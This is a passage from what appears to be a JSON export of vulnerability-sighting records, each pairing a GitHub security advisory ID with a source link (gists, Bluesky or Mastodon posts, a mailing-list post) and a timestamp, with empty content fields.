"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "7fe32c16-047b-4555-8139-5549c480af0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "6b8ec38f-ea13-439b-9926-e8390fbf61f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "ed1ee255-3f8d-4d8d-8456-843c12e76b20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "447efa36-e43d-4eab-8ee2-e2bc5027c8a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "d8613e4c-18c8-4850-a5b7-64401b4581bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "82daf544-1941-46f7-a490-230a7bc8c02a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "5fcccfce-5f76-40f3-badd-ba53e9237d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "990ef551-4a7b-440c-93e2-fd85d6d2e478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/2a07e4eb98bcdb60260dd20c1d06293e", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "ae24ccc7-ac1c-48f0-88dc-f1d7483a075c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwgg-m7fx-83wx", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lpk6dyaf5q2d", "content": "", "creation_timestamp": "2025-05-19T18:12:42.113858Z"}, {"uuid": "efe4d0f0-b129-485f-9180-b3a160136ddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "b2e2ca07-73cc-44f8-9b06-9177a9f0fb9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "ac951f0e-7f1c-4621-9dc8-b3dd99128045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "9da9c874-bf82-4976-ba19-d9d2145a3bf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "c082d7f8-5f67-40e3-87c8-803122fd2bdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "da9a1b0b-18de-4795-b161-67ae4c3f3019", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwpq-wm8w-44wf", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lstzj74xp22s", "content": "", "creation_timestamp": "2025-06-30T20:28:20.500877Z"}, {"uuid": "c889603d-9119-44f2-b9ce-6f52bdbe4118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7x3c-335v-wxjj", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lstzj74xp22s", "content": "", "creation_timestamp": "2025-06-30T20:28:20.594002Z"}, {"uuid": "2ef2b460-d3a1-4736-8510-b62190c32f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "d89feb7a-68d6-4237-8a09-695d09ad5fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "d90164a4-2a8d-4e8f-9216-52566487ce3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/10f03eee26c6b2d03eeb47e6979053b4", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "3346283b-73f2-4ac8-b934-49f55e034d45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "4a1cebff-4c85-45b4-9f36-90be5e99d492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "23d284e0-56a9-4e3b-819d-3a9175edef52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "7f11fbea-2ec7-4214-b083-a6b44f7d4b81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "6eca43b1-fe3a-4b4c-ad4b-ee1f64b5a53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "23256f1a-0639-47c7-aa18-c02872745c39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "4793f67e-2f24-4dc6-be62-f6ae6d683027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "7796e063-b96e-4e8a-826c-dbee5e98aa86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "78372f62-04b8-4ec4-92dd-38bf5d56dc65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "0c4bdfd5-a44c-4c16-81cf-1f29a899baf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "ab531d6f-e1d8-495d-8332-4d67d0f7f525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "140bd4fd-cb94-4dd7-a7c6-615fa4c3a23e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "7cc5e869-e45a-4d9d-b18c-8183cfbec957", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "6900fb2d-8bb5-42bc-b6a0-a90982d4f41a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/d87b22b12805dc9fc2abef39daedb1a8", "content": "", "creation_timestamp": "2025-06-17T01:44:35.000000Z"}, {"uuid": "203b23b8-79bc-4bfb-ab36-35fbf9c20679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "c92464bd-32ef-4f94-930d-1d1034b92522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "67a23fba-37f3-4a1b-a2b6-3dd77fdc0116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "224c1cc8-9cb1-4339-8792-dca7c4343efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "9c191edb-77ec-4f22-8644-b794b21f8daa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "3218f77c-ee4c-4365-b6ce-65dda6780cf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "ece0a4c4-a18f-4028-b878-6c513cf4501e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "358f0c50-e8e7-47ed-ba75-0b651c0532a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "c8426541-f993-4ea6-88f6-cc9ad9b84b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "c879db72-128e-46c5-831c-96e0f4964d13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/bc71b7ea9498f314a39ed52a43adb3bf", "content": "", "creation_timestamp": "2025-06-17T01:47:49.000000Z"}, {"uuid": "aa40c8d2-e7af-4898-b92c-ced3a9a4155f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "57b9c6ad-a166-4640-a513-48ad96fab7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "a350c0e5-e71d-4a27-aef2-4673e1f86f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "8f4c97a6-f2ac-4145-a56e-cd3c46287547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "568bcd12-24b3-437f-9a7a-22921ea8f585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "89d62e41-67d2-46f2-8b48-aca1f5842751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "f0865b93-1e0c-4bcf-a468-2086e5f9d11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "c8a3a446-35e6-42c0-b30f-542351c9373c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "74b7d950-d83d-4400-942f-6841806ef37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "03cf72c3-f414-4781-a667-ef102ee91d12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/0f0ba2be5742b529d00c05a9961ff146", "content": "", "creation_timestamp": "2025-06-17T01:54:55.000000Z"}, {"uuid": "ab804dd7-cfd3-4b7d-9c90-5afa58e3f238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37cp-fgq5-7wc2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114350256396276490", "content": "", "creation_timestamp": "2025-04-16T23:34:02.099874Z"}, {"uuid": "281ca52d-28ae-4a6a-9dc6-57673b610690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819847067340594", "content": "", "creation_timestamp": "2025-07-08T21:57:07.271274Z"}, {"uuid": "d73ab39b-5182-4a42-94e7-bbee70368a30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/d18c961302984311ff47c26030f5c337", "content": "", "creation_timestamp": "2025-07-16T06:49:27.000000Z"}, {"uuid": "f377a73a-c264-45d6-a029-1596c27ceb9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f7h-mf4q-vrm4", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "cb62cac7-3c4d-41d2-a6d5-e0cb5687d4f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "404457b6-0c57-4460-9be7-c5a6514a02d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/d401023bd37217e755d139e34deb22bc", "content": "", "creation_timestamp": "2025-07-16T06:54:26.000000Z"}, {"uuid": "a27c6d29-45e7-46f7-82f8-e080c043c5ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "0ceba226-20c3-46fb-b5bc-760e4aa70ead", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rcjj-h6gh-jf3r", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "9397b12e-08a8-41cd-9842-e39012c757e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "127cff4c-1394-42e2-b73d-a5efa1ec4b30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "d4a0df3e-85fc-43d0-bbfe-1489bfe1b27a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "7d7c8128-733e-4f8c-be85-7a62ea19a53c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "ede68c93-3fad-4fce-9e0c-c322ec18a89d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "9dd2038d-2c22-4a83-b8ba-404ca143251e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "5da10dc6-7c22-4474-a1c4-3f840896b0c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "5feed027-f625-42d0-90c7-9dc9fc04ace7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "0522e9dc-6474-4cb1-bf86-9077d9a3d4fa", "vulnerability_lookup_origin": 